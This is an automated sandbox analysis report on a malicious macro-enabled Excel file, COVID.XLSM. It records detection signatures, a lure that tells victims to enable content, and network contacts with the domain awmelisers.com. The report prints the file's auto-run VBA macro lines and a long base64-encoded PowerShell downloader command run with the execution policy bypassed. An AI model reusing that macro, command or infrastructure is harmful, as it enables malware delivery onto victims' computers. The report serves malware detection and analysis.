Windows Analysis Report COVID.XLSM

Overview

General Information

Sample Name: COVID.XLSM
Analysis ID: 471900
MD5: c123363068a4651c9c0c6b4e01b35142
SHA1: 8de437d8df29c53e9ebb03a797fdbf805c10429a
SHA256: e5e65b70b5497f146609db5c086e997a4b0ab2352b534c9e25d8a10407801d78
Tags: xlsx
Infos:

Most interesting Screenshot:

Detection

Score: 76
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Document contains an embedded VBA macro which may execute processes
Document contains an embedded VBA macro with suspicious strings
Bypasses PowerShell execution policy
Encrypted powershell cmdline option found
Very long command line found
Creates processes via WMI
Machine Learning detection for sample
Queries the volume information (name, serial number etc) of a device
Potential document exploit detected (unknown TCP traffic)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Document contains an embedded VBA macro which executes code when the document is opened / closed
Document contains embedded VBA macros
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Creates a process in suspended mode (likely to inject code)
Contains long sleeps (>= 3 min)
Enables debug privileges

Classification

AV Detection:

barindex
Machine Learning detection for sample
Source: COVID.XLSM Joe Sandbox ML: detected
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll Jump to behavior
Source: Binary string: ws\dll\mscorlib.pdb source: powershell.exe, 00000004.00000002.2104750981.0000000002926000.00000004.00000001.sdmp
Source: Binary string: mscorlib.pdb source: powershell.exe, 00000004.00000002.2104776827.0000000002A07000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\symbols\dll\System.Management.Automation.pdb=C:\ source: powershell.exe, 00000004.00000002.2104776827.0000000002A07000.00000004.00000040.sdmp
Source: Binary string: ws\System.Management.Automation.pdbpdbion.pdbamDa source: powershell.exe, 00000004.00000002.2104776827.0000000002A07000.00000004.00000040.sdmp
Source: Binary string: scorlib.pdb source: powershell.exe, 00000004.00000002.2104776827.0000000002A07000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\mscorlib.pdbn source: powershell.exe, 00000004.00000002.2104776827.0000000002A07000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\dll\System.Management.Automation.pdb:\Pr source: powershell.exe, 00000004.00000002.2104776827.0000000002A07000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\mscorlib.pdbemen source: powershell.exe, 00000004.00000002.2104776827.0000000002A07000.00000004.00000040.sdmp
Source: Binary string: ws\mscorlib.pdbpdblib.pdb source: powershell.exe, 00000004.00000002.2104776827.0000000002A07000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\symbols\dll\mscorlib.pdb source: powershell.exe, 00000004.00000002.2104776827.0000000002A07000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000004.00000002.2104776827.0000000002A07000.00000004.00000040.sdmp
Source: Binary string: mscorrc.pdb source: powershell.exe, 00000004.00000002.2104791872.0000000002A10000.00000002.00000001.sdmp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini Jump to behavior

Software Vulnerabilities:

barindex
Potential document exploit detected (unknown TCP traffic)
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 206.81.23.172:443
Potential document exploit detected (performs DNS queries)
Source: global traffic DNS query: name: awmelisers.com
Potential document exploit detected (performs HTTP gets)
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 206.81.23.172:443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49166
Source: unknown Network traffic detected: HTTP traffic on port 49165 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49165
Source: unknown Network traffic detected: HTTP traffic on port 49166 -> 443
Source: powershell.exe, 00000004.00000002.2104314415.0000000002390000.00000002.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: powershell.exe, 00000004.00000002.2104314415.0000000002390000.00000002.00000001.sdmp String found in binary or memory: http://www.%s.comPA
Source: powershell.exe, 00000004.00000002.2103643804.0000000000372000.00000004.00000020.sdmp String found in binary or memory: http://www.piriform.com/ccleaner
Source: powershell.exe, 00000004.00000002.2108444301.0000000003746000.00000004.00000001.sdmp, powershell.exe, 00000004.00000002.2105066116.0000000002C21000.00000004.00000001.sdmp String found in binary or memory: https://awmelisers.com
Source: powershell.exe, 00000004.00000002.2107955947.00000000035CC000.00000004.00000001.sdmp String found in binary or memory: https://awmelisers.com/0
Source: powershell.exe, 00000004.00000002.2110218103.000000001B593000.00000004.00000001.sdmp, powershell.exe, 00000004.00000002.2107955947.00000000035CC000.00000004.00000001.sdmp String found in binary or memory: https://awmelisers.com/api/v3/achyranthes/contrapolarization/kulturkreis
Source: powershell.exe, 00000004.00000002.2107955947.00000000035CC000.00000004.00000001.sdmp String found in binary or memory: https://awmelisers.comPE
Source: powershell.exe, 00000004.00000002.2108444301.0000000003746000.00000004.00000001.sdmp String found in binary or memory: https://awmelisers.comp
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\C6078775.png Jump to behavior
Source: unknown DNS traffic detected: queries for: awmelisers.com

System Summary:

barindex
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Source: Screenshot number: 4 Screenshot OCR: Enable Editing 10 11 12 13 14 15 16 2 Click on "Enable Content" to perform Microsoft Office
Source: Screenshot number: 4 Screenshot OCR: Enable Content" to perform Microsoft Office Decryption Core to start the 17 decryption of the docu
Source: Document image extraction number: 0 Screenshot OCR: Enable Editing' to unlock the editing document downloaded from the Internet ' il S Protected View
Source: Document image extraction number: 0 Screenshot OCR: Enable Content" to perform Microsoft Office Decryption Core to start the decryption of the document
Source: Document image extraction number: 1 Screenshot OCR: Enable Editing" to unlock the editing document downloaded from the Internet ' jJ C) Protected View
Source: Document image extraction number: 1 Screenshot OCR: Enable Content" to perform Microsoft Office Decryption Core to start the decryption of the document
Document contains an embedded VBA macro which may execute processes
Source: COVID.XLSM OLE, VBA macro line: Set objConfig = objStartup.SpawnInstance_
Document contains an embedded VBA macro with suspicious strings
Source: COVID.XLSM OLE, VBA macro line: strstr = "cmd.exe /c ""powershell -ExecutionPolicy BypasS -ENC " + StrConv(Decode64(XUN_Status_IIWSY()), vbFromUnicode) + """"
Source: COVID.XLSM OLE, VBA macro line: strstr = "cmd.exe /c ""powershell -ExecutionPolicy BypasS -ENC " + StrConv(Decode64(XUN_Status_IIWSY()), vbFromUnicode) + """"
Very long command line found
Source: unknown Process created: Commandline size = 3581
Source: C:\Windows\System32\cmd.exe Process created: Commandline size = 3569
Source: C:\Windows\System32\cmd.exe Process created: Commandline size = 3569 Jump to behavior
Document contains an embedded VBA macro which executes code when the document is opened / closed
Source: COVID.XLSM OLE, VBA macro line: Private Sub Workbook_Open()
Document contains embedded VBA macros
Source: COVID.XLSM OLE indicator, VBA macros: true
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\fe6ac93181b40a571892e14bfb9d65f2\mscorlib.ni.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ..".....................#.................(...............(.......#.....`I%........v.....................K,......."............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....#...............uH.j......................T.............}..v....x.......0.................l............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ..".............y=.v..../................K.j.....!l...............T.............}..v............0.................".....l....................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v..../...............uH.j....p.................T.............}..v............0.................l............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....;.......A.t. .l.i.n.e.:.2.9. .c.h.a.r.:.3.7.............}..v............0...............8.l.....$....................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....;...............uH.j......................T.............}..v....8.......0.................l............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ..".............y=.v....G................K.j.....!l...............T.............}..v....X.......0.................".....\....................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....G...............uH.j......................T.............}..v............0.................l............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ..".............y=.v....S................K.j.....!l...............T.............}..v....P#......0................."............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....S...............uH.j.....$................T.............}..v.....$......0.................l............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ..".............y=.v...._................K.j.....!l...............T.............}..v.....)......0.................".....f....................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v...._...............uH.j....x*................T.............}..v.....*......0.................l............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....k....... ........K.j.....!l...............T.............}..v............0...............8.l............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....k...............uH.j....@/................T.............}..v...../......0.................l............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ..".............y=.v.......................j......l...............T.............}..v....@.......0.................".....j....................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j......................T.............}..v....x.......0...............H.l............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v............A.t. .l.i.n.e.:.3.0. .c.h.a.r.:.5.1.............}..v............0.................l.....$....................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j....@.................T.............}..v............0...............H.l............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ..".............y=.v.......................j......l...............T.............}..v............0.................".....x....................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j......................T.............}..v....P.......0...............H.l............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ..".............y=.v.......................j......l...............T.............}..v............0................."............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j......................T.............}..v....P.......0...............H.l............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v............ . . . .R.u.n.t.i.m.e.E.x.c.e.p.t.i.o.n.........}..v....h.......0.................l.....(....................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j.... .................T.............}..v............0...............H.l............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ..".............y=.v.......................j......l...............T.............}..v............0.................".....`....................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j......................T.............}..v............0...............H.l............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v............ ..........j......l...............T.............}..v............0.................l............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j....H.................T.............}..v............0...............H.l............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ..".............y=.v.......................j......l...............T.............}..v....H.......0.................".....j....................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j......................T.............}..v............0...............H.l............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v............A.t. .l.i.n.e.:.3.1. .c.h.a.r.:.2.8.............}..v............0.................l.....$....................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j....H.................T.............}..v............0...............H.l............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ..".............y=.v.......................j......l...............T.............}..v............0.................".....j....................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j......................T.............}..v....@.......0...............H.l............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ..".............y=.v.......................j......l...............T.............}..v............0................."............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j......................T.............}..v....@.......0...............H.l............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v............ . . .e.p.t.i.o.n.l...............T.............}..v............0.................l............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j......................T.............}..v............0...............H.l............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ..".............y=.v.......................j......l...............T.............}..v....0.......0.................".....`....................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j......................T.............}..v....h.......0...............H.l............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....#....... ..........j......l...............T.............}..v............0.................l............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....#..................j......................T.............}..v....0.......0...............H.l............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ..".............y=.v....7..................j......l...............T.............}..v....P.......0.................".....j....................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....7..................j......................T.............}..v............0...............H.l............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....C.......A.t. .l.i.n.e.:.3.5. .c.h.a.r.:.2.7.............}..v............0.................l.....$....................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....C..................j....P.................T.............}..v............0...............H.l............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....O.......+. . . . . .$.r.e.s.p.o.n.s.e._.s.t.r.e.a.m...C.l.o.s.e. .<.<.<.<. .(.)...........l.....H....................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....O..................j......................T.............}..v............0...............H.l............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ..".............y=.v....[..................j......l...............T.............}..v............0................."............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....[..................j......................T.............}..v............0...............H.l............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................0.......g....... . . .p.t.i.o.n.8bX..... .........T.............}..v............ .................l............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....g..................j....p ................T.............}..v..... ......0...............H.l............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ..".............y=.v....s..................j......l...............T.............}..v.....&......0.................".....`....................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....s..................j.....&................T.............}..v....P'......0...............H.l............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v............ ..........j......l...............T.............}..v.....*......0.................l............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j.....+................T.............}..v.....,......0...............H.l............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ..".............y=.v.......................j......l...............T.............}..v............0................."............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....................u..j....x.................T.............}..v............0.................l............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v............a.l.i.d. .W.i.n.3.2. .a.p.p.l.i.c.a.t.i.o.n.....}..v.... .......0...............8.l............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....................u..j......................T.............}..v....X.......0.................l............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v............A.t. .l.i.n.e.:.3.8. .c.h.a.r.:.1.8.............}..v....h.......0...............8.l.....$....................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....................u..j.... .................T.............}..v............0.................l............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ..".............y=.v.......................j......l...............T.............}..v............0.................".....\....................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....................u..j....x.................T.............}..v............0.................l............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ..".............y=.v.......................j......l...............T.............}..v.....#......0................."............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....................u..j....x$................T.............}..v.....$......0.................l............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v............ . . .e.r.a.t.i.o.n.E.x.c.e.p.t.i.o.n...........}..v.....)......0...............8.l.....&....................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....................u..j.....)................T.............}..v....H*......0.................l............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ..".............y=.v.......................j......l...............T.............}..v.....1......0................."............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....................u..j.....1................T.............}..v....H2......0.................l............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v............ . . .o.m.m.a.n.d.s...S.t.a.r.t.P.r.o.c.e.s.s.C.o.m.m.a.n.d.....0...............8.l.....<....................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....................u..j....@7................T.............}..v.....7......0.................l............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v............ ..........j......l...............T.............}..v....P;......0...............8.l............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....................u..j.....<................T.............}..v.....<......0.................l............................. Jump to behavior
Source: unknown Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Source: unknown Process created: C:\Windows\System32\cmd.exe cmd.exe /c 'powershell -ExecutionPolicy BypasS -ENC ZgB1AG4AYwB0AGkAbwBuACAAUABTAC0ASQBuAHMAdABhAGwAbABlAHIAVgAyACAAewAKACAAIAAgACAAcABhAHIAYQBtACgACgAgACAAIAAgACAAIAAgACAAWwBQAGEAcgBhAG0AZQB0AGUAcgAoAE0AYQBuAGQAYQB0AG8AcgB5AD0AJAB0AHIAdQBlACwAIABQAG8AcwBpAHQAaQBvAG4APQAwACkAXQAKACAAIAAgACAAIAAgACAAIABbAHMAdAByAGkAbgBnAF0AIAAkAGwAaQBuAGsALAAKACAAIAAgACAAIAAgACAAIABbAFAAYQByAGEAbQBlAHQAZQByACgATQBhAG4AZABhAHQAbwByAHkAPQAkAHQAcgB1AGUALAAgAFAAbwBzAGkAdABpAG8AbgA9ADEAKQBdAAoAIAAgACAAIAAgACAAIAAgAFsAcwB0AHIAaQBuAGcAXQAgACQAZQBuAGQAcABvAGkAbgB0ACwACgAgACAAIAAgACAAIAAgACAAWwBQAGEAcgBhAG0AZQB0AGUAcgAoAE0AYQBuAGQAYQB0AG8AcgB5AD0AJAB0AHIAdQBlACwAIABQAG8AcwBpAHQAaQBvAG4APQAyACkAXQAKACAAIAAgACAAIAAgACAAIABbAHMAdAByAGkAbgBnAF0AIAAkAGYAaQBsAGUAXwBkAGkAcgAsAAoAIAAgACAAIAAgACAAIAAgAFsAUABhAHIAYQBtAGUAdABlAHIAKABNAGEAbgBkAGEAdABvAHIAeQA9ACQAdAByAHUAZQAsACAAUABvAHMAaQB0AGkAbwBuAD0AMwApAF0ACgAgACAAIAAgACAAIAAgACAAWwBzAHQAcgBpAG4AZwBdACAAJABmAGkAbABlAF8AbgBhAG0AZQAsAAoAIAAgACAAIAAgACAAIAAgAFsAUABhAHIAYQBtAGUAdABlAHIAKABNAGEAbgBkAGEAdABvAHIAeQA9ACQAdAByAHUAZQAsACAAUABvAHMAaQB0AGkAbwBuAD0ANAApAF0ACgAgACAAIAAgACAAIAAgACAAWwBzAHQAcgBpAG4AZwBdACQAZQB4AHQAZQBuAHMAaQBvAG4ALAAKACAAIAAgACAAIAAgACAAIABbAFAAYQByAGEAbQBlAHQAZQByACgATQBhAG4AZABhAHQAbwByAHkAPQAkAHQAcgB1AGUALAAgAFAAbwBzAGkAdABpAG8AbgA9ADUAKQBdAAoAIAAgACAAIAAgACAAIAAgAFsAYgBvAG8AbABdACAAJAB1AHMAZQBfAGEAYwBjAGUAcwBzACwACgAgACAAIAAgACAAIAAgACAAWwBQAGEAcgBhAG0AZQB0AGUAcgAoAFAAbwBzAGkAdABpAG8AbgA9ADYAKQBdAAoAIAAgACAAIAAgACAAIAAgAFsAcwB0AHIAaQBuAGcAXQAgACQAYQBjAGMAZQBzAHMAXwBzAHQAcgBpAG4AZwAKACAAIAAgACAAKQAKAAoAIAAgACAAIAAkAGkAbgB0AGUAcgBuAGEAbABfAG0AZQBtAG8AcgB5ACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABJAE8ALgBNAGUAbQBvAHIAeQBTAHQAcgBlAGEAbQAKAAoAIAAgACAAIAAkAHIAZQBxAF8AcwB0AHIAIAA9ACAAJABsAGkAbgBrACAAKwAgACIALwAiACAAKwAgACQAZQBuAGQAcABvAGkAbgB0AAoAIAAgACAAIABpAGYAIAAoACQAdQBzAGUAXwBhAGMAYwBlAHMAcwApACAAewAKACAAIAAgACAAIAAgACAAIAAkAHIAZQBxAF8AcwB0AHIAIAA9ACAAJAByAGUAcQBfAHMAdAByACAAKwAgACIALwAiACAAKwAgACQAYQBjAGMAZQBzAHMAXwBzAHQAcgBpAG4AZwAKACAAIAAgACAAfQAKAAoAIAAgACAAIAAkAHMAYQB2AGUAXwBwAGEAdABoACAAPQAgACQAZgBpAGwAZQBfAGQAaQByACAAKwAgACIAXAAiACAAKwAgACQAZgBpAGwAZQBfAG4AYQBtAGUAIAArACAAIgAuACIAIAArACAAJABlAHgAdABlAG4AcwBpAG8AbgAKAAoAIAAgACAAIAAkAHIAZQBxAHUAZQBzAHQAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAUgBlAHEAdQBlAHMAdABdADoAOgBDAHIAZQBhAHQAZQAoACIAJAByAGUAcQBfAHMAdAByACIAKQAKACAAIAAgACAAJAByAGUAcwBwAG8AbgBzAGUAIAA9ACAAJAByAGUAcQB1AGUAcwB0AC4ARwBlAHQAUgBlAHMAcABvAG4AcwBlACgAKQAKACAAIAAgACAAJAByAGUAcwBwAG8AbgBzAGUAXwBzAHQAcgBlAGEAbQAgAD0AIAAkAHIAZQBzAHAAbwBuAHMAZQAuAEcAZQB0AFIAZQBzAHAAbwBuAHMAZQBTAHQAcgBlAGEAbQAoACkACgAgACAAIAAgACQAcgBlAHMAcABvAG4AcwBlAF8AcwB0AHIAZQBhAG0ALgBDAG8AcAB5AFQAbwAoACQAaQBuAHQAZQByAG4AYQBsAF8AbQBlAG0AbwByAHkAKQAKAAoAIAAgACAAIABTAGUAdAAtAEMAbwBuAHQAZQBuAHQAIAAkAHMAYQB2AGUAXwBwAGEAdABoACAALQBWAGEAbAB1AGUAIAAkAGkAbgB0AGUAcgBuAGEAbABfAG0AZQBtAG8AcgB5AC4AVABvAEEAcgByAGEAeQAoACkAIAAtAEUAbgBjAG8AZABpAG4AZwAgAEIAeQB0AGUACgAKACAAIAAgACAAJAByAGUAcwBwAG8AbgBzAGUAXwBzAHQA
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -ExecutionPolicy BypasS -ENC ZgB1AG4AYwB0AGkAbwBuACAAUABTAC0ASQBuAHMAdABhAGwAbABlAHIAVgAyACAAewAKACAAIAAgACAAcABhAHIAYQBtACgACgAgACAAIAAgACAAIAAgACAAWwBQAGEAcgBhAG0AZQB0AGUAcgAoAE0AYQBuAGQAYQB0AG8AcgB5AD0AJAB0AHIAdQBlACwAIABQAG8AcwBpAHQAaQBvAG4APQAwACkAXQAKACAAIAAgACAAIAAgACAAIABbAHMAdAByAGkAbgBnAF0AIAAkAGwAaQBuAGsALAAKACAAIAAgACAAIAAgACAAIABbAFAAYQByAGEAbQBlAHQAZQByACgATQBhAG4AZABhAHQAbwByAHkAPQAkAHQAcgB1AGUALAAgAFAAbwBzAGkAdABpAG8AbgA9ADEAKQBdAAoAIAAgACAAIAAgACAAIAAgAFsAcwB0AHIAaQBuAGcAXQAgACQAZQBuAGQAcABvAGkAbgB0ACwACgAgACAAIAAgACAAIAAgACAAWwBQAGEAcgBhAG0AZQB0AGUAcgAoAE0AYQBuAGQAYQB0AG8AcgB5AD0AJAB0AHIAdQBlACwAIABQAG8AcwBpAHQAaQBvAG4APQAyACkAXQAKACAAIAAgACAAIAAgACAAIABbAHMAdAByAGkAbgBnAF0AIAAkAGYAaQBsAGUAXwBkAGkAcgAsAAoAIAAgACAAIAAgACAAIAAgAFsAUABhAHIAYQBtAGUAdABlAHIAKABNAGEAbgBkAGEAdABvAHIAeQA9ACQAdAByAHUAZQAsACAAUABvAHMAaQB0AGkAbwBuAD0AMwApAF0ACgAgACAAIAAgACAAIAAgACAAWwBzAHQAcgBpAG4AZwBdACAAJABmAGkAbABlAF8AbgBhAG0AZQAsAAoAIAAgACAAIAAgACAAIAAgAFsAUABhAHIAYQBtAGUAdABlAHIAKABNAGEAbgBkAGEAdABvAHIAeQA9ACQAdAByAHUAZQAsACAAUABvAHMAaQB0AGkAbwBuAD0ANAApAF0ACgAgACAAIAAgACAAIAAgACAAWwBzAHQAcgBpAG4AZwBdACQAZQB4AHQAZQBuAHMAaQBvAG4ALAAKACAAIAAgACAAIAAgACAAIABbAFAAYQByAGEAbQBlAHQAZQByACgATQBhAG4AZABhAHQAbwByAHkAPQAkAHQAcgB1AGUALAAgAFAAbwBzAGkAdABpAG8AbgA9ADUAKQBdAAoAIAAgACAAIAAgACAAIAAgAFsAYgBvAG8AbABdACAAJAB1AHMAZQBfAGEAYwBjAGUAcwBzACwACgAgACAAIAAgACAAIAAgACAAWwBQAGEAcgBhAG0AZQB0AGUAcgAoAFAAbwBzAGkAdABpAG8AbgA9ADYAKQBdAAoAIAAgACAAIAAgACAAIAAgAFsAcwB0AHIAaQBuAGcAXQAgACQAYQBjAGMAZQBzAHMAXwBzAHQAcgBpAG4AZwAKACAAIAAgACAAKQAKAAoAIAAgACAAIAAkAGkAbgB0AGUAcgBuAGEAbABfAG0AZQBtAG8AcgB5ACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABJAE8ALgBNAGUAbQBvAHIAeQBTAHQAcgBlAGEAbQAKAAoAIAAgACAAIAAkAHIAZQBxAF8AcwB0AHIAIAA9ACAAJABsAGkAbgBrACAAKwAgA